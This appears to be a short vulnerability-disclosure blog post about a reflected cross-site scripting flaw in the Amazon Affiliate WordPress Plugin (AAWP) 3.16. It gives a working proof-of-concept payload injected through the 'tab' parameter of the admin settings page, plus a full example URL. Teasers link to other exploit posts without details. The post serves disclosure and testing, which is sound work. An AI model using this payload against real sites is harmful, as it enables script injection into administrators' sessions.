Home Bug & Exploit BUG Exploit at Amazon Affiliate WordPress Plugin (AAWP) 3.16

BUG Exploit at Amazon Affiliate WordPress Plugin (AAWP) 3.16

By
ariefzufar
-
154
0

Amazon Affiliate WordPress Plugin (AAWP) 3 v16 is Best WordPress Plugin for Amazon Affiliates Increase the value of your affiliate page and your earned commissions!

Proof of Concept:
# Go to /wp-admin/admin.php?page=aawp-settings&tab=XXXX
# Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# XSS has been triggered.

Example :
http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y

Unauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP[4] and paired with a MySQL Read more

Smart Product Review 1.0.4 Arbitrary File Upload on WordPress

Smart Product Review is an All in One review pack for your WooCommerce store. It lets you add customers’ reviews and Read more

Previous articleHow to do an ip address lookup via extreme-ip-lookup.com in php
Next articleBUG Exploit at All-in-One Video Gallery Plugins 2.4.9
ariefzufar
https://blog.arizu.my.id

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here